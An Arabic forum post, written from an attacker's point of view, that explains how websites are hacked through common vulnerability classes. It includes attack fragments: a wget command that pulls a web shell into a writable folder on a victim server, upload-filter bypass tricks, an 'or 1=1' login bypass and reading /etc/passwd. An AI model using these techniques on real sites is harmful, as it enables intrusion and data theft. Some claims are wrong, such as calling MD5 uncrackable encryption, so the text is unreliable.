السلام عليكم و رحمة الله و بركاته
ربما سمعت يوما ب اختراق موقع ما و لكنك لا تعلم يكف تمت عمليت الاختراق
قبل ان اقوم ب تنزيل هادا الشرح ترددت قليلا لانه سوف يعتبر من التقليل من قيمة المتابعين لانه اي شخص يعرف ما هي الثغرة و لكن و في احد المرات و في العالم الحقيقي سالني احد الاصدقاء
انت تخترق المواقع كيف هل تنتضرهم في الليل حتى ينامو و تخترق انت الموقع !!
من الواضح ان صديقي شخص غبي كثيرا لانه سال مثل هادا السؤال لهادا اليوم و في هده التدوينة المتواضعة سوف نناقش مع بعض كيف يتم اختراق المواقع
الثغرة
في البداية يجب ان تعرف ما هي الثغرة قبل ان تعرف كيف يخترق الموقع من خلالها
هل الثغرة موجودة مسبقا و المبرمج اخطء في الكود
احيانا على سبيل المثال هناك ثغرة ب اسم xss تاتي ب سبب عدم عمل فلترة ل البينات المدخلة من قبل المستخدم ف جميع المبرمجين الان يتفادون هده الثغرة لانهم يعرفونها مثلها مثل باقي الثغرات
اما هناك ثغرات لا وجود لها مسبقا
اي ان الثغرة لم تكتشف بعد و احيانا تسمى 0day او الهجوم دون انتضار او Zero-day attack
دعونا تعرف مع بعض على هادا النوع من الثغرات
Zero-day attack هو استغلال نقاط الضعف في البرمجيات وثغراتها الأمنية خاصة غير المعروفة منها للعامة أو حتى مطوريها في شن هجومات إلكترونية. غالبا ما يتم استغلال هذه الثغرات وحتى تشاركها ما بين القراصنة “Hackers” قبل أن تكتشفها الجهات المطورة للبرمجيات المصابة. المعرفة بالثغرة الأمنية قبل المطورين، تسمح لمستغليها بالحصول على فترة زمنية ينشر فيها أدواته الخبيثة لتحدث ضررا كبيرا. لأنه متى ما اكتشفت الثغرة الأمنية، يسارع المطورون لسدها من خلال نشر برامج تصحيحية.
المصطلح Zero-day attack أتى من كون أن مستغل الثغرة الأمنية غير المعروفة لا يترك أي يوم يمر لبدء هجومه كونه في سباق مع الزمن. وطالما تأخر اكتشاف الثغرة، منح ذلك مزيد من الوقت للمهاجمين في توسيع نطاق الهجوم وإضافة ضحايا جدد
و ادا لم تفهم سوف افهمك غصباعنك
مثلا
مثلا هناك سكربت يقوم ب عملية التصال ب قواعد البينات و تسجيل الدخول ب اسم مستخدم و كلمة سر !!!
حسنا سوف نحاول نحن ك attack ان نقوم ب البحث على اي طريقة ل استغلال تلك العملية ل مصالحنا (الاختراق) و بكل تاكيد في هادا السكربت العديد من المتغيرات والعديد الدوال و ب خبرتنا في البرمجة سوف نحاول ايجاد ثغرة ما في طبيعة العمل اي المنطق البرمجي على سبيل المثال عندكتابتك لاسم المستخدم و كلمة السر بكل تاكيد هناك اشياء تحدث وراء الكواليس فس السيرفر
و سوف نحاول نحن كمهاجمين ان نستغلهال ما نريد
انواع الثغرات الاكثر انتشارا و التي يستغلها الهاكرز ب شدة
اللوكال.locall. تكون اللوكال وانت محلي على السيرفر وتسمى باللوكال .هذا النوع يقصد به محلي يعني انك لازم تكون على الشل مثلا يعني متواجد على السيرفر .:.
الريموت.remot. وهي تسمى بالسيطرة عن بعد وهذا النوع اخطر من اللوكال .ويقصد به التحكم عن بعد وانت على جهازك تشغل الثغرة على الموقع ايا كان نوع او طريقة عمل الثغرة راح تشتغل معك .:.
————————————————————-
ثغرات الفايل انكلود :Remote File Inclusion Vulnerabilityy
هذا النوع من الثغرات .يقصد بها ان مصمم السكربت قد وقع في خطا برمجي وهذا الخطا يسمح لنا (((( بربط ملف خارجي بالموقع )))
ما هو الملف الخارجي؟؟ (((( الشل او اي اداه اختراق ))))).
اما عن كيفية اكتشافها فهي صعبة لكن من لديه خبرة في لغة php او اللغات البرمجة الاخرى
فيمكنه اكتشافها بتنزيل السكربت عندة والبحث عنها في السكربت يدويا او عن طريق بعض البرامج التي اثبتث جدارتها في البحث عن ثغرات الفايل انكلود.:.:.:.
هذه الثغرة مشرروحة بكثرة في منتدانا .:. لانها سهله هعهعهعهع فلن اشرح عنها اكثر
————————————————————-
ثغرات قواعد البيانات: SQL Injectionn
وتمكننا هذه الثغرة من معرفة معلومات مهمة ومختلفة حسب العمل الذي تقوم به اقرب مثال لهذه الثغرة معرفة اسم الدخول وكلمة المرور لمدير الموقع
هذا النوع من الثغرات تعتمد على اخطاء السكربتات التي تتعامل مع قواعد البيانات
وعند استطاعتنا الحصول على الباسورد هنا نقف عند نوع التشفير فاذا كان الباسورد مشفر تشفير (md5) وهو اصعب تشفير في مجال المواقع ولا اعتقد ان هناك برامج تفك هذا التشفير
و هناك سكربتات لتشفير الرقم السري الى (md5) بمجرد ما تضع الرقم السري راح يحولة الى 32
لكن هناك بعض البرامج التي تفك لك التشفير 90%1000 لكن بوجود السالت تبع الادمن وهي الكلمة السرية لتذكر الباسورد عند نسيانة عن طريق التخمين
يعمل التخمين بتقنية المقارنة اي تعطيه الباسورد المشفر ويبدا المقارنة فاذا كانت المقارنة هي التساوي اذا قد تم فك التشفير
ولاستكشاف هذه الثغرة يجب ان تنفذ الاستكشاف عن رابط يكون له اتصال بقواعد البيانات
————————————————————-
ثغرات XXS : Cross-Site Scriptingg
(html) او (جافا سكربت .**********) يعني بامكانك تنفيذها باي مكان فيه ادراج كتابة .مثلا ادراج الكود في الاهداء
عن طريق هذا الكود (مو شرط ايكون هذا)>>>
كود:
(’zer0o0-hacker’)
.:.: بعض الاستغلات لهذه الثغرة…
سحب كوكيز اعضاء الموقع
تلغيم الموقع
اضافة اي كود جافا سكربت
بلغة (html) او (جافا سكربت .**********) .:.:
و هذه الثغرات تنقسم الى ( الدوم والبريسنت والنان بريسنت)…ok
————————————————————-
ثغرات الرفع : File Uploedd
وهذه الثغرات بالنسبة للمبتدئين من اسهل الثغرات يعني بسهولة ثغرة فايل انكلود لكن الاختلاف ان هذه الثغرات بعدها شغالة على بعض مراكز التحميل
يعني تعتمد على نوع السكربت الذي يستخدمه مركز التحميل
بمجرد انك ترفع الشل و تاخذ الرابط وتضعه في المتصفح راح يشتغل .:. وفي بعض المرات تحتاج الى خداع المركز من ناحية الامتداد
بحيث يكون امتداد الشل .:. هكذا r57,php,rar او c99.php.jpgg او غير امتداد
او مثلا اذا كان هناك مركز تحميل الاغاني بمجرد انك ما ترفع ملف مثل ملف htaccess. وتضع به اكواد مختلفة لاستقبال الملفات مثل كود يشغل ملفات الام بي اثري كملفات php
وبعد رفعه اتروح ترفع ملف الشل الي هو php بعد تحويل صيغته ال mp3 وترفعه على المركز هعععععععععععع وراخ يشتغل معاك
بعض منها شغالة على مراكز التحميل
ثغرات : Command Executionn
هذه الثغرات تشبه ثغرات الفايل انكلود ولكن الاختلاف انك ما راح تضيف اداه الاختراق باحد
المتغيرات المصابة بل تمكننا هذه الثغرة من كتابة اوامر ((linux)) اي اوامر نضام لينكس اي اوامر الشل … يعني
تسمح لنا باعطاء اوامر للسيرفر بالاصح التحكم بالسيرفر حسب الصلاحية مثلا امر اضهار ملفات الموقع dir او ls او اضهار صلاحيتك عبر الامر id الخ
يعني مثلا نحن في هذا المسار
127.0.0.1/index.php?id=pwd
ومن تلاقي مجلد له تصريح 777 مثلا المجلد data في تصريح 7777
تدخل للمجلد بالامر cd وتسحب الشل بالامر wget مثلا هكذا
cd home/domains/zer0o0-hack.com/public_html/vb/data;wget http://link[shell.zip
الان راح يعمل معاك الشل بمجرد تاخذ مسار الشل الذي وضعته في المجلد وتضعه بعد رابط الموقع وهكذا
وهناك شروحات اخرى عنها
————————————————————-
ثغرات : File Disclosuree
الثغرة الي فوق
وهذه الثغرة تمكننا في بعض االاحيان السيطرة على السيرفر كاملا اي بالاصح قرائة الملفات المهمة مثل ملفات
(etc/ (passwd,valiasess وبالامكان ايضا قرائة ملفات اي موقع بالسيرفر حسب مكانه في السيررفر
————————————————————-
ثغرات البوفر اوفر فلو : buffer overfloww
مثلا دخلنا على احد السكربتات وطلب منا ان ندخل الاسم ومبرمج السكربت طلب من البرنامج ان عدد الاحرف لاسم المستخدم لن يتجاوز 20
يعني معقولة في اسم يتجاوز عشرين حرف او مثلا اسم عضو يتجاوز ثلاثين حرف مو معقولة
حسنا متى تحصل الثغرة عندما ندخل مثلا 100 او 1500 حرف كاسم للمستخدم البيانات اذي ادخلناها ستكون زائدة جدا فسيحصل طفحان وهو يسمى
“”overflow“” في ذاكرة التي خصصت لمتغير الاسم
هذه الثغرات ترشدنا الى معلومات اخرى منها= المعالجة (proccesss) فالمعالجة هي المسئولة عن العمليات التي تحصل في الحاسبة
ولكل عملية تحصل في الحاسبة لها عنوان فاضي في الذاكرة .:. ولا يمكن لاي عملية او برنامج اي يدخل الى هذه الذاكرة المخصصة لتلك العملية .:.
ايضا يجب عينا ان نذهب لنقرا القليل عن ادارة الذاكرة ((memory management) عندما يكون لدينا عدد كبير من العمليات موجهة الى الذاكرة الحقيقة .:.
وفي نفس الوقت الذاكرة الحقيقة اصغر من كمية المهام الموجهة للذاكرة الحقيقة ستحصل مشكلة ؟؟ اليس كذلك
استغلال هذه الثغرات يكون . عندما ندخل بيانات اكبر حجما من الذاكرة التي خصصت لهذه البيانات فان البيانات الزائدة ستفيض في الذاكرة بعد المتغير ؟؟ من هذا المكان في الذاكرة
سوف نستفاد من هذه الثغرات وهذه الدروس موجودة او ابحث عنها في كوكل
ربي يسهلها لكم جميعا ولكل من ناوي يتعلم لافادة الاسلام والمسلمين
ايضا بالامكان عن طريق هذه الثغرات ان ناخذ روت بدون ما نرفع شل اصلا
————————————————————-
ثغرات :Remote Dump Database او
هذه الثغرات تعمل على حسب انواع السكربت واصداراتها .:. مثل ما قلنا لكل اصدار او سكربت ثغرة وطرق عدة لاستغلالها
هذا النوع من الثغرات وهو خاص بسحب باك اب لسكربت معين او نسخ قواعد بيانات كاملة
من خلال ملف سواء ان يكون مجلد الادمن او اي مجلد وضيفته سحب المعلومات من جداول قاعدة البيانات
ومن خلالها سحب الملعومات المهمة الموجودة في users ..الخ..
فكرة الثغرة انها تقوم باخذ باك اب للسكربت الموجود ومن خلالها سوف نقراء المعلومات المهمة
مثلا اذا سحبنا ملف قاعدة البيانات للمنتدى ايش استفدنا اليوزر والباس المشفر هع للادمن ومواقع الفك كثيرة جدا
اغلب الملفات تبع الباك اب يختلف مسارها لكن الاغلب في مجلد admin
واسماء الملفات ايضا الاغلب تكون هكذا ::backup.php or upgrade.phpp هي بالاصل تعتمد على مبرمج السكربت وتسميته ملفاته .:.
———————————————————————————————
ثغرات :bypass admin control panal اوBypass :
هذه الثغرات تسمح لنا بتجاوز لوحة التحكم control panall تبع الادمن . اي تخطي صفحة طلب الباسبورد والاسم المرخص لهم بدخول لوحة تحكم
طريقة {{{{{ or 1=11}}}}}}}}}}} حسب الرموز التي تدخلها والرموز كثيرة جدا او عن طريقة الدخول على اي ملف من ملفات المجلد من خلال السكربت
ويمكن نتخطاها بهذه الطريقة هذه الثغرة لها الكثير من الطرق وشرحها سيطول لكن من باب الاستفادة ذكرتها لكم
————————————————————-
ثغرات : Remote Admin Password Changee اي تغيير كلمة السر من التحكم البعيد
هذا النوع مشهور واقرب مثال له هي ثغرة سكربت جوملة token joomall هذه الثغرة تسمح لنا بتغيير باسورد
مدير الموقع بدون الحاجة لمعرفة الباسورد القديم . ايضا هناك طريقه جديدة عن هذه الثغرات من اكتشاف احد العباقرة الفلنديين
عجبتني الطريقة عبر مشاهدتها عبر احد الشروحات له وهي بوضع اكواد مختلفة من كافة لغات البرمجة ثم يبدا بتشفيرها .تشفير جديد لم اعرفه ايضا ذكرتها من باب الاستفادة
————————————————————-
المهم اخوان هذه الثغرات المعروفة هي جزء من كثير من الثغرات .:. ولكل ثغرة طرق اخرى في الاختراق
وهذه بعض الطرق التي تتم مناقشتها من قبل الهكرز المحترفين
1-Data center Attack وهو سحب بيانات الداتا سنتر التي تدعم الموقع
2-DNS Attack هذه الطريقة تعتمد على تحويل DNS الداعم للسيرفر
3-penetration of Domainn باين من اسمة (وهو اختراق الدومين للموقع المستهدف (بعدة طرق))
4-Remote Roott هذه الطريقة تعتمد على الحصول على الروت من غير شل وهي عن طريق بعض الطرق ومن هذه الطرق
شرحت عنه وهي (buffer over flow) وغيرها الخ
5-ddos attack وهي عملية حجب الخدمة ايضا تكون بعدة طرق
6-Server Mail supporterr هذه طرق حديثة تعتمد على وضع اكواد لتغيير الايميل الداعم للسيرفر
7-Cpanel Commandss هذه الطريقة تعتمد على تنفيذ بعض الاوامر من خلال عمل ادوات تطابق (cpanel) وتنفيذ الاوامر منهاواكيد راح تتمكن من رفع الاندكس تبعك
او التعديل في الموقع
8- xss قليل من يعرفون عنها وذو طريقة فعالة
وهناك الكثير ايضا من الطرق لكن الشي الاخير هو يجب ان تعتمد على ما اعطاك ربك وهو عقلك
تصنيف اخطر الثغرات و الاكثر انتشارا حسب ما نشرته owasp
1 ثغرات الحقن Injection
تحدث عيوب الحقن مثل SQL, OS, XXE, LDAP injection عند إرسال بيانات غير موثوق بها إلى المترجم كجزء من أمر أو استعلام البيانات العدائية للمهاجم يمكن خداع المترجم إلى تنفيذ الأوامر غير مقصودة أو الوصول إلى البيانات دون إذن صحيح و اختراق الوقع
2 Broken Authentication and Session Management
وغالبا ما تنفذ functions التطبيقات المتعلقة التوثيق وإدارة الجلسة بشكل غير صحيح، مما يسمح للمهاجمين بخرق كلمات السر، والمفاتيح، أو الرموز الدورة، أو لاستغلال عيوب التنفيذ الأخرى لتحمل هويات المستخدمين الآخرين (مؤقتا أو بشكل دائم)
Broken Access Control 4
لا يتم فرض قيود على ما يسمح للمستخدمين المخولين القيام به بشكل صحيح. يمكن للمهاجمين استغلال هذه العيوب للوصول إلى وظائف و / أو بيانات غير مصرح بها، مثل الوصول إلى حسابات المستخدمين الآخرين، وعرض الملفات الحساسة، وتعديل بيانات المستخدمين الآخرين، وتغيير حقوق الدخول، وما إلى ذلك
Security Misconfiguration 5
يتطلب الأمن الجيد وجود configuration آمن تم تعريفه ونشره للتطبيق والأطر وخادم التطبيق وخادم الويب وخادم قاعدة البيانات والمنصة وما إلى ذلك. يجب تحديد الإعدادات الآمنة وتنفيذها وصيانتها نظرا لأن الإعدادات الافتراضية غالبا ما تكون غير آمنة. بالإضافة إلى ذلك، يجب أن تبقى البرامج حتى الآن
Sensitive Data Exposure 6
العديد من تطبيقات الويب وواجهات برمجة التطبيقات لا تحمي البيانات الحساسة بشكل صحيح، مثل financial, healthcare, and PII. يمكن للمهاجمين سرقة أو تعديل هذه البيانات ضعيفة الحماية لإجراء الاحتيال بطاقة الائتمان، وسرقة الهوية، أو غيرها من الجرائم. البيانات الحساسة تستحق حماية إضافية مثل التشفير في الراحة أو في العبور، فضلا عن الاحتياطات الخاصة عند تبادلها مع المتصفح
حماية هجوم غير كافية
غالبية التطبيقات وواجهات برمجة التطبيقات تفتقر إلى القدرة الأساسية للكشف عن، ومنع، والرد على كل من الهجمات اليدوية والآلية. الحماية الهجوم تتجاوز أبعد من التحقق من صحة المدخلات ويتضمن involves automatically detecting logging, responding ، وحتى حجب استغلال محاولات. أصحاب التطبيقات أيضا بحاجة إلى أن تكون قادرة على نشر بقع بسرعة للحماية ضد الهجمات
و بعد ما تعرفنا على كيف يتم اختراق المواقع عبر الثغرات و انواعها
يجب ان نتعرف على بعض الطرق الاخرى و التي هي نادرة الاستخدام
الهندسة الاجتماعية
ربما سوف تتعجب قليلا و تنضر في نفسك
و تقول هندسة اجتماعية لاختراق المواقع !!! طبعا هي امر عجيب و هدا النوع من الطرق نادر الاستخدام ابرز ما تم اختراقه ب الهندسة الاجتماعية كان الموقع الرسمي الدي يعطي شهادة الهكر الاخلاقي CEH حينها جمع المهاجم الكثير من المعلومات حول المدير و قد علم ان له ولد مصاب ب مرض السلطان (عافانا الله و اياكم) و ارسل له عبر الايميل انه من جمعية التكفل ب مرضى السلطان ووو و بدا التقرب منه و ارسل له ملفPDF ملغم و من ان فتحه المدير حتى تم اختراق الشركة ب الكامل و قد تم اختراق موقعهم الرسمي ايضا
و لكن هده الطرق تحتاج الكثير من الصبر
وهناك نوع اخر من اختراق المواقع
اختراق المواقع عبر DNS hijacking او اختطاف نظام أسماء النطاقات
شرح وافي و كافي بارك الله فيك
bein dit
و فيك بركة شكرا للمرور